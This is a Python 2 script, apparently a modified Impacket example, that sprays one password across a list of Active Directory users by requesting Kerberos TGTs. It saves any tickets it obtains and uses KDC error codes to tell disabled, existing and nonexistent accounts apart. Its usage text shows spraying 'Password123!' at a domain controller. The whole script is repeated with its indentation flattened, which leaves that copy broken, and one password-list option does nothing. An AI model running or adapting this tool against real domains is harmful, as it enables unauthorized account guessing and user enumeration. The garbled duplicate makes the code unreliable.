carnal0wnage/getTGT.py

## getTGT.py
#!/usr/bin/env python
# Copyright (c) 2016-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
#  Alberto Solino (@agsolino)
#
# Description:
#    Given a password, hash or aesKey, it will request a TGT and save it as ccache
#
# Examples:
#         ./getTGT.py -hashes lm:nt contoso.com/user
#
#
import argparse
import logging
import sys
from binascii import hexlify, unhexlify

from impacket import version
from impacket.examples import logger
from impacket.krb5.kerberosv5 import getKerberosTGT
from impacket.krb5 import constants
from impacket.krb5.types import Principal


class GETTGT:
    def __init__(self, target, password, domain, options):
        self.__password = password
        self.__user= target
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__aesKey = options.aesKey
        self.__options = options
        self.__kdcHost = options.dc_ip
        if options.hashes is not None:
            self.__lmhash, self.__nthash = options.hashes.split(':')

    def saveTicket(self, ticket, sessionKey):
        logging.info('Saving ticket in %s' % (self.__user + '.ccache'))
        from impacket.krb5.ccache import CCache
        ccache = CCache()

        ccache.fromTGT(ticket, sessionKey, sessionKey)
        ccache.saveFile(self.__user + '.ccache')

    def run(self):
        try:
            userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey,
                                                                self.__kdcHost)
            self.saveTicket(tgt,oldSessionKey)
        except Exception as e:
            print('{}: {}'.format(userName,e))

'''
disableduser : KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)  <-- disabled account
validuser : Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid) <-- wrong password
nonexistuser : Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) <-- group name or nonexistent user
'''

if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    print version.BANNER

    parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
                                                                "TGT and save it as ccache")
   # parser.add_argument('identity', action='store', help='[domain/]username[:password]')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                       'ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                       'ommited it use the domain part (FQDN) specified in the target parameter')
    group.add_argument('-username', action='store',metavar = "username",  help='username to use every time REALM/USERNAME')
    group.add_argument('-userlist', action='store',metavar = "user_list",  help='user list to use for password spray')
    group.add_argument('-password', action='store',metavar = "password",  help='password to pass along')
    group.add_argument('-passwordlist', action='store',metavar = "password_list",  help='password list to use for password spray')
    group.add_argument('-domain', action='store',metavar = "domain",  help='REALM value to use')

    if len(sys.argv)==1:
        parser.print_help()
        print "\nExamples: "
        print "\t./getTGT_brute.py -hashes lm:nt contoso.com/user\n"
        print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -username admin -password 'Password123!' -dc-ip 192.168.1.2\n"
        print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -userlist username_list.txt -password 'Password123!' -dc-ip 192.168.1.2\n"
        print "\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked"
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)


    import re
    #domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
    #    '')

    domain = options.domain
    username = options.username
    password = options.password
    userlist = options.userlist
    passwordlist = options.passwordlist


    try:
        if domain is None:
            logging.critical('Domain should be specified!')
            sys.exit(1)

        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
            from getpass import getpass
            password = getpass("Password:")

        if options.aesKey is not None:
            options.k = True

        if userlist is not None:
            lines = [line.rstrip('\n') for line in open(userlist)]
            for x in lines:
                executer = GETTGT(x, password, domain, options)
                executer.run()

        #executer = GETTGT(username, password, domain, options)
        #executer.run()
    except Exception, e:
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        print str(e)
	#!/usr/bin/env python
	# Copyright (c) 2016-2018 CORE Security Technologies
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# Author:
	# Alberto Solino (@agsolino)
	#
	# Description:
	# Given a password, hash or aesKey, it will request a TGT and save it as ccache
	#
	# Examples:
	# ./getTGT.py -hashes lm:nt contoso.com/user
	#
	#
	import argparse
	import logging
	import sys
	from binascii import hexlify, unhexlify

	from impacket import version
	from impacket.examples import logger
	from impacket.krb5.kerberosv5 import getKerberosTGT
	from impacket.krb5 import constants
	from impacket.krb5.types import Principal



	class GETTGT:
	def __init__(self, target, password, domain, options):
	self.__password = password
	self.__user= target
	self.__domain = domain
	self.__lmhash = ''
	self.__nthash = ''
	self.__aesKey = options.aesKey
	self.__options = options
	self.__kdcHost = options.dc_ip
	if options.hashes is not None:
	self.__lmhash, self.__nthash = options.hashes.split(':')

	def saveTicket(self, ticket, sessionKey):
	logging.info('Saving ticket in %s' % (self.__user + '.ccache'))
	from impacket.krb5.ccache import CCache
	ccache = CCache()

	ccache.fromTGT(ticket, sessionKey, sessionKey)
	ccache.saveFile(self.__user + '.ccache')

	def run(self):
	try:
	userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
	tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
	unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey,
	self.__kdcHost)
	self.saveTicket(tgt,oldSessionKey)
	except Exception as e:
	print('{}: {}'.format(userName,e))

	'''
	disableduser : KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) <-- disabled account
	validuser : Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid) <-- wrong password
	nonexistuser : Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) <-- group name or nonexistent user
	'''

	if __name__ == '__main__':
	# Init the example's logger theme
	logger.init()
	print version.BANNER

	parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
	"TGT and save it as ccache")
	# parser.add_argument('identity', action='store', help='[domain/]username[:password]')
	parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

	group = parser.add_argument_group('authentication')

	group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
	group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
	group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
	'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
	'ones specified in the command line')
	group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
	'(128 or 256 bits)')
	group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
	'ommited it use the domain part (FQDN) specified in the target parameter')
	group.add_argument('-username', action='store',metavar = "username", help='username to use every time REALM/USERNAME')
	group.add_argument('-userlist', action='store',metavar = "user_list", help='user list to use for password spray')
	group.add_argument('-password', action='store',metavar = "password", help='password to pass along')
	group.add_argument('-passwordlist', action='store',metavar = "password_list", help='password list to use for password spray')
	group.add_argument('-domain', action='store',metavar = "domain", help='REALM value to use')

	if len(sys.argv)==1:
	parser.print_help()
	print "\nExamples: "
	print "\t./getTGT_brute.py -hashes lm:nt contoso.com/user\n"
	print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -username admin -password 'Password123!' -dc-ip 192.168.1.2\n"
	print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -userlist username_list.txt -password 'Password123!' -dc-ip 192.168.1.2\n"
	print "\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked"
	sys.exit(1)

	options = parser.parse_args()

	if options.debug is True:
	logging.getLogger().setLevel(logging.DEBUG)
	else:
	logging.getLogger().setLevel(logging.INFO)


	import re
	#domain, username, password = re.compile('(?:(?:([^/:])/)?([^:])(?::([^@]*))?)?').match(options.identity).groups(
	# '')

	domain = options.domain
	username = options.username
	password = options.password
	userlist = options.userlist
	passwordlist = options.passwordlist


	try:
	if domain is None:
	logging.critical('Domain should be specified!')
	sys.exit(1)

	if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
	from getpass import getpass
	password = getpass("Password:")

	if options.aesKey is not None:
	options.k = True

	if userlist is not None:
	lines = [line.rstrip('\n') for line in open(userlist)]
	for x in lines:
	executer = GETTGT(x, password, domain, options)
	executer.run()

	#executer = GETTGT(username, password, domain, options)
	#executer.run()
	except Exception, e:
	if logging.getLogger().level == logging.DEBUG:
	import traceback
	traceback.print_exc()
	print str(e)